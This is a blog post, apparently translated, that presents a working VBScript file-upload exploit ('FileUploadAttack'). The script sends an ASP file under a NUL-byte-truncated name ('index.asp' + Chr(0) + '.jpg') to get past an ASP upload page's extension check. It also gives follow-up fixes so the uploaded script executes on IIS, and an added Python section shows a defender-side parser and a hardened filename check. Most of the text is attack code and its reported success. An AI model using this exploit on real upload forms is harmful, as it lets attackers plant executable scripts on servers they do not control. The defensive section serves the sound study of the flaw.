Some of the scripts in this article are offensive and are for study and research only. Please use them within the legal and reasonable scope. I am not responsible for the losses caused, and I do not provide technical guidance on hacking attacks.
Demon mentioned this issue today, and it reminded me of an article I saw a while ago, "Automatic file upload using IE+ADO without user interaction - VBScript". That article gives an example of a local, non-interactive automatic upload script, which can be borrowed for today's purpose. The original script uses the InternetExplorer.Application component; I rewrote it to use WinHttp.WinHttpRequest.5.1 to achieve a similar function. For more on how to use this component, refer to the "WinHttpRequest Object Reference".
The code is as follows:

Option Explicit

Function file_get_contents(filename)
    Dim fso, f
    Set fso = WSH.CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(filename, 1)
    file_get_contents = f.ReadAll
    f.Close
    Set f = Nothing
    Set fso = Nothing
End Function

' Code modified from http://www.motobit.com/tips/detpg_uploadvbsie/
Class FileUploadAttack
    Private m_objWinHttp
    Private m_strUrl
    Private m_strFieldName

    Private Sub Class_Initialize()
        Set m_objWinHttp = WSH.CreateObject( _
            "WinHttp.WinHttpRequest.5.1")
    End Sub

    Private Sub Class_Terminate()
        Set m_objWinHttp = Nothing
    End Sub

    Public Sub setUrl(url)
        m_strUrl = url
    End Sub

    Public Sub setFieldName(name)
        m_strFieldName = name
    End Sub

    ' Information in the form field header.
    Function mpFields(FieldName, FileName, ContentType)
        Dim MPTemplate ' template for the multipart header
        MPTemplate = "Content-Disposition: form-data; name=""{field}""; " + _
            "filename=""{file}""" + vbCrLf + _
            "Content-Type: {ct}" + vbCrLf + vbCrLf
        Dim Out
        Out = Replace(MPTemplate, "{field}", FieldName)
        Out = Replace(Out, "{file}", FileName)
        mpFields = Replace(Out, "{ct}", ContentType)
    End Function

    ' Converts an OLE string to a multibyte string
    Function StringToMB(S)
        Dim I, B
        For I = 1 To Len(S)
            B = B & ChrB(Asc(Mid(S, I, 1)))
        Next
        StringToMB = B
    End Function

    ' Build the multipart/form-data document with file contents and header info
    Function BuildFormData(FileContents, Boundary, _
        FileName, FieldName)
        Dim FormData, Pre, Po
        Const ContentType = "application/upload"
        ' The two parts around the file contents in the multipart form data.
        Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _
            FileName, ContentType)
        Po = vbCrLf + "--" + Boundary + "--" + vbCrLf
        ' Build form data using a recordset binary field
        Const adLongVarBinary = 205
        Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset")
        RS.Fields.Append "b", adLongVarBinary, _
            Len(Pre) + LenB(FileContents) + Len(Po)
        RS.Open
        RS.AddNew
        Dim LenData
        ' Convert the Pre string value to binary data
        LenData = Len(Pre)
        RS("b").AppendChunk StringToMB(Pre) & ChrB(0)
        Pre = RS("b").GetChunk(LenData)
        RS("b") = ""
        ' Convert the Po string value to binary data
        LenData = Len(Po)
        RS("b").AppendChunk StringToMB(Po) & ChrB(0)
        Po = RS("b").GetChunk(LenData)
        RS("b") = ""
        ' Join Pre + FileContents + Po binary data
        RS("b").AppendChunk Pre
        RS("b").AppendChunk FileContents
        RS("b").AppendChunk Po
        RS.Update
        FormData = RS("b")
        RS.Close
        BuildFormData = FormData
    End Function

    Public Function sendFile(FileName)
        Const Boundary = "---------------------------0123456789012"
        m_objWinHttp.Open "POST", m_strUrl, False
        m_objWinHttp.setRequestHeader "Content-Type", _
            "multipart/form-data; boundary=" + Boundary
        Dim FileContents, FormData
        ' Get the source file as binary data.
        FileContents = file_get_contents(FileName)
        ' The following constructs the malicious file extension Chr(0) & ".jpg"
        ' Build the multipart/form-data document
        FormData = BuildFormData(FileContents, Boundary, _
            FileName & Chr(0) & ".jpg", m_strFieldName)
        m_objWinHttp.send FormData
        sendFile = m_objWinHttp.Status
    End Function

    Public Function getText()
        getText = m_objWinHttp.ResponseText
    End Function
End Class

Function VBMain()
    VBMain = 0
    Dim fileUpload
    Set fileUpload = New FileUploadAttack
    ' Modify the following values to suit your environment
    ' Upload URL
    fileUpload.setUrl "http://localhost/upload/uploadfile.asp"
    fileUpload.setFieldName "filepath" ' The name of the upload form field
    ' The path of the file to be uploaded
    If fileUpload.sendFile("E:/projects/asp/index.asp") = 200 Then
        MsgBox "Upload succeeded: " & fileUpload.getText()
    Else
        MsgBox "Upload failed"
    End If
    Set fileUpload = Nothing
End Function
Call WScript.Quit(VBMain())

The upload page is a simple ASP file-upload script found on the Internet, to which I added the GetFileExtensionName function described in my article "The origin of CHR(0) in ASP/VBScript and the security issues it brings" to check whether the extension is jpg.
The test results: uploading the asp file manually failed; uploading it with the attack script above succeeded! There is indeed an asp file in the upload directory. The asp file can also be accessed through its URL in the browser, but strangely it renders blank. I am using IIS 7 here. Is it an IIS version problem? Or should file_get_contents return the file's binary stream? Let's leave this question here for now; there are other things to do, so I'll stop here.
The full experimental code can be downloaded here: upload.zip (for the code bugs, see the update notes below).
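To make the server-side failure concrete, here is an added Python example (my own code, not the post's VBScript and not the ASP upload page it tests). It builds a multipart/form-data body of the same shape as BuildFormData above, parses it the way an upload handler would, and then contrasts an extension check of the kind the post describes (text after the last dot, which I assume is what GetFileExtensionName does, since its source is not shown) with a hardened check that rejects the filename before any extension logic runs. The boundary, field name and ASP snippet are constructed sample values; the "name on disk" function models the NUL truncation the post observed, not an API call.

```python
"""Defender-side view of the Chr(0) extension trick discussed above."""
import re

# Same boundary style as the post's script (constructed sample value)
BOUNDARY = "---------------------------0123456789012"
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

def build_multipart(field, filename, content_type, body, boundary=BOUNDARY):
    """Build a single-file multipart/form-data body (mirrors Pre + file + Po)."""
    pre = (f"--{boundary}\r\n"
           f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
           f"Content-Type: {content_type}\r\n\r\n")
    po = f"\r\n--{boundary}--\r\n"
    # latin-1 keeps every code point < 256 as one byte, including NUL
    return pre.encode("latin-1") + body + po.encode("latin-1")

_DISPOSITION_RE = re.compile(rb'name="([^"]*)"; filename="([^"]*)"')

def parse_multipart(body, boundary=BOUNDARY):
    """Return (field, filename, file_bytes) of the first file part, or None."""
    delimiter = b"--" + boundary.encode("ascii")
    for part in body.split(delimiter):
        if part in (b"", b"\r\n", b"--\r\n"):
            continue                      # preamble / closing delimiter
        head, sep, data = part.partition(b"\r\n\r\n")
        if not sep:
            continue
        match = _DISPOSITION_RE.search(head)
        if not match:
            continue
        if data.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            data = data[:-2]
        return (match.group(1).decode("latin-1"),
                match.group(2).decode("latin-1"),
                data)
    return None

def naive_extension(filename):
    """Models the vulnerable check: extension is whatever follows the last dot."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""

def effective_name_on_disk(filename):
    """Models what a NUL-terminated filesystem API actually writes (assumption
    based on the post's observation that index.asp landed in the upload dir)."""
    return filename.split("\x00", 1)[0]

def hardened_check(filename):
    """Return (ok, reason). Reject control characters and path components first,
    then validate the extension of the basename that would really be written."""
    if any(ord(c) < 32 or ord(c) == 127 for c in filename):
        return False, "control character in filename"
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        return False, "empty filename"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    return True, "ok"

# Constructed sample payload standing in for the post's E:/projects/asp/index.asp
SAMPLE_ASP = b'<% Response.Write("constructed sample") %>'

def demo():
    """Run the constructed upload through both checks and report what each sees."""
    body = build_multipart("filepath", "index.asp\x00.jpg",
                           "application/upload", SAMPLE_ASP)
    field, filename, data = parse_multipart(body)
    return {
        "field": field,
        "naive_ext": naive_extension(filename),       # 'jpg': the naive check passes
        "on_disk": effective_name_on_disk(filename),  # 'index.asp': what gets written
        "hardened": hardened_check(filename),         # rejected before extension logic
        "file_bytes_intact": data == SAMPLE_ASP,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point the hardened check makes is ordering: validating the extension of a string that can still contain NUL (or a path separator) validates a name the filesystem will never use. Rejecting control characters first, then deriving the extension from the basename, closes the gap the post exploits.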
Updated on December 25, 2011.
Based on everyone's feedback, the uploaded file ends up with a Unicode little-endian encoding problem. First of all, I'm sorry, because I was really lazy at the time. The main code is referenced from a foreigner's article, which describes a GetFile function for obtaining the file's binary data. I couldn't find that function's implementation, and I was too lazy to do the binary reading, so I just used file_get_contents to obtain text data. It turns out this is indeed a problem. The remedial measures are explained below. The lazy fix is to convert the text data directly into binary data on top of the existing code, using the ADODB.Stream component; the function is as follows:
The code is as follows:

' Convert the string str in the specified charset to binary
Function strtobin(str, charset)
    With WSH.CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Mode = 3 ' adModeReadWrite
        .Open
        .Charset = charset
        .WriteText str
        .Flush
        .Position = 0
        .Type = 1 ' adTypeBinary
        strtobin = .Read()
        .Close
    End With
End Function
Then change the line FileContents = file_get_contents(FileName) in sendFile (line 106 of the original listing) to the following, which reads the text as ASCII:

    FileContents = strtobin(file_get_contents(FileName), "ASCII")

After this change, the uploaded ASP file is an ordinarily encoded file, and when the browser accesses it you can see that the ASP is parsed successfully.
However, this seems a bit roundabout. In fact, you can open the file directly in binary mode and return the data. The approach above takes two steps: 1. read the file in text mode; 2. convert the text into binary data. For the one-step version, refer to the following function, which reads the file data in binary Byte() mode:
The code is as follows:

' Returns file contents as binary data
Function GetFile(FileName)
    Dim Stream: Set Stream = CreateObject("ADODB.Stream")
    Stream.Type = 1 ' Binary
    Stream.Open
    Stream.LoadFromFile FileName
    GetFile = Stream.Read
    Stream.Close
    Set Stream = Nothing
End Function

I won't write the more optimized code; this post mainly explains an upload idea. If you want a complete upload implementation, refer to Demon's "VBS Simulation POST Upload File".